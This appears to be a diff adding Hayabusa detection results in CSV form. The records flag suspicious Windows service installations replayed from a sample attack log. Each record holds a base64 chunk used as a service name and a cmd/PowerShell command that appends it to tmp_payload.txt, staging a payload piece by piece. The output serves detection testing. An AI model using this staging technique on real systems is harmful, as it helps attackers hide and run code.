+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
